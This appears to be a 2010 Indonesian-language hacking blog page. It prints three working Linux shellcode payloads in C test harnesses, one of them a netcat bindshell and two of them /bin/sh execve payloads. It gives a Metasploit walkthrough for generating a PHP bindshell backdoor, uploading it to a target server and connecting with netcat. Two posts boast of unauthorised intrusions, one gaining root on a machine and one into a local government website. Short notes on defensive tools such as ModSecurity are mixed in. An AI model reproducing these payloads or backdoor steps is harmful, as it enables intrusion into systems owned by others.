2010
08.27
/*
Name : 86 bytes "polymorphic - netcat bindport 55155"
Info : this shellcode create a bindport 55155 with netcat
Author : otoy
Blog : http://otoyrood.wordpress.com
Date : August 2010
Tested on: ubuntu 8.04 & Backtrack 4
*/
#include
char shellcode[] =
"\xeb\x13\x5e\x31\xc9\xb1\x3c\x80\x2e\x45\x80\x36\x45\x80\x06"
"\x45\x46\xe2\xf4\xeb\x05\xe8\xe8\xff\xff\xff\xee\x83\x46\x7d"
"\x93\xab\xb1\xf4\xb1\xa0\xab\xf4\xf4\x9d\xa6\x46\x20\x93\xab"
"\xfa\xee\xfa\xfa\xab\xf2\xa7\xb3\xfa\x46\x1e\x93\xab\xf4\xf4"
"\xb0\xab\xab\xf4\x9d\xa6\xb1\xab\xf2\xa0\xf4\xf4\x46\x1d\x93"
"\x73\xc8\x8d\x8e\x90\x46\x1e\xee\x0d\x12\xc3";
int main(void)
{
fprintf(stdout,"[*] Shellcode length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
2010
08.24
/*
Name : 28 bytes "/bin/sh" shellcode -
execve(/bin/sh,[/bin/sh,null,null],null)
Info : A woking shellcode for bof exploit
Author : otoy
Blog : http://otoyrood.wordpress.com
Date : August 2010
Tested on: ubuntu 8.04 & Backtrack 4
*/
#include
char shellcode[] =
"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
int main(void)
{
fprintf(stdout,"[*] Shellcode length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
2010
08.24
Akhirnya… Shellcode pertama… 
/*
Name : 20 bytes "/bin/sh" shellcode - execve(/bin/sh,..,..)
Info : this shell workout without zeroing registers it used first (eax,ebx,ecx)
Author : otoy
Blog : http://otoyrood.wordpress.com
Date : August 2010
Tested on: ubuntu 8.04 & Backtrack 4
*/
#include
char shellcode[] =
"\xeb\x06" /* jmp 8048068 */
"\x5b" /* pop %ebx */
"\x8d\x41\x0b" /* lea 0xb(%ecx),%eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xf5\xff\xff\xff" /* call 8048062 */
"\x2f" /* das */
"\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */
"\x2f" /* das */
"\x73\x68"; /* jae 80480dc */
int main(void)
{
fprintf(stdout,"[*] Shellcode length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
2010
08.20
Apa sih..?? berburu telur paskah…?? heemm… egghunter adalah salah satu tehnik yang digunakan dalam pembuatan exploit. Ada kalanya ketika kita menulis sebuah exploit, kita berhadapan dengan “ruang” yang sempit untuk memasukan shellcode yang kita miliki, untuk mengakali sempitnya “ruang” tersebut, kita bisa menggunakan tehnik egghunter untuk mengeksekusi(loncat ke) shellcode yang kita miliki.
Read More >>
2010
08.13
ModSecurity is a good starting point to secure your web site. OWASP provides the core rule set (CRS) for ModSecurity rules against the most critical web application attack.
From OWASP:
ModSecurity is an Apache web server module that provides a web application firewall engine. The ModSecurity Rules Language engine is extrememly flexible and robust and has been referred to as the “Swiss Army Knife of web application firewalls.”
…
In order to enable users to take full advantage of ModSecurity out of the box, we have developed the Core Rule Set (CRS) which provides critical protections against attacks across most every web architecture.
Check OWASP Core Rule Set home page for more info.
Download here
2010
08.12
Ingin membuat sebuah php bindshell dengan mudah..?? metasploit adalah sebuah tool yang sangat powerfull, termasuk dalam urusan membuat php bindshell.
Berikut ini langkah-langkah mudahnya:
[+] Buat Bindshell.
# msfpayload php/bind_php LPORT=55521 R > kutu.php
KET: Perintah diatas akan membuat sebuah script php (kutu.php), yang berfungsi untuk membuat sebuah bindshell(backdoor) di port 55521
[+] Edit script php kita (kutu.php), lalu tambahkan tag php pada awal dan akhir script.
[+] Upload script ke server target. 
[+] Akses script php yang sudah kita upload pada server target, melalui web browser kita.
http://192.168.0.100/kutu.php
[+] Akses bindshell yang sudah kita buat mengunakan netcat.
PS: Selain bindshell, kita juga dapat membuat reverseshell, bahkan meterpreter.
2010
08.11
Seperti biasa, setelah iseng-iseng dan berhasil memanfaatkan backdoor orang lain (secara kebetulan ), lalu iseng-iseng mencoba berbagai Local exploit… akhirnya ketemu yang pass.. walhasil mesin berhasil di kuasai sepenuhnya (root..!! )
pesan moralnya: jangan lupa update/patch system anda.
2010
08.06
andiparos merupakan fork dari Praos Proxy. sama seperti Netsparker tool ini di tujukan untuk pengujian keamanan aplikasi web, tool ini adalah tool opensource. Ada beberapa hal yang menjadi fitur dari tool ini:
- Smartcard support
- BeanShell support
- History Filter (URLs)
- Tag requests in history
- dan beberapa peningkatan lainya
Link Download.
2010
08.05
Hmmm… setelah iseng-iseng dan berhasil memasuki salah satu situs milik pemerintah daerah, saya menemukan hal menarik, yang (kemungkinan besar) dilakukan oleh si admin, yaitu memanfaatkan server tersebut sebagai tempat penyimpanan/downloader video porno.. 
, dan hal seperti ini juga sering di temukan oleh teman-teman yang lain.
2010
08.05
Netsparker adalah sebuah sebuah web application security scanner tool, yang dapat membantu anda dalam melakukan pencarian celah keamana pada sebuah web.
keunggulan dari program buatan Mavituna Security ini adalah, tool ini dapat melakukan uji coba terhadap kesalahan(bug) yang di temukannya, sehingga mencegah terjadinya peringatan yang salah terhadap sebuah celah keamanan yang ditemukan.
Selain versi berbayar, Netsparker juga hadir dalam versi gratis.
